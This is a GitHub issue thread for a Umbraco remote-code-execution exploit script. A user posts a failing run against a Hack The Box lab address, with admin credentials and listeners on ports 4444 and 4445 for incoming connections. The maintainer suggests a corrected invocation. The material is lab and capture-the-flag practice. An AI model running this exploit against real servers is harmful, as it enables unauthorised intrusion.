Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

unable to complete #2

Open
cybertuxh4xor opened this issue Feb 11, 2023 · 2 comments
Open

unable to complete #2

cybertuxh4xor opened this issue Feb 11, 2023 · 2 comments

Comments

@cybertuxh4xor
Copy link

kali@kali:/tmp/Umbraco-RCE$ python3 exploit.py -u admin@htb.local -p baconandcheese -i 10.10.10.180 -w http://10.10.10.180/umbraco
[+] Trying to bind to :: on port 4444: Done
[→] Waiting for connections on :::4444
[+] Trying to bind to :: on port 4445: Done
[>] Waiting for connections on :::4445
Traceback (most recent call last):
File "/tmp/Umbraco-RCE/exploit.py", line 95, in
main()
File "/tmp/Umbraco-RCE/exploit.py", line 60, in main
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
TypeError: 'NoneType' object is not subscriptable

@Jonoans
Copy link
Owner

Jonoans commented Feb 15, 2023

You could take a look at #1

@Jonoans
Copy link
Owner

Jonoans commented Feb 15, 2023

Maybe leave out the /umbraco for the value passed to the -w option.

python3 exploit.py -u admin@htb.local -p baconandcheese -i [your IP] -w http://10.10.10.180/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants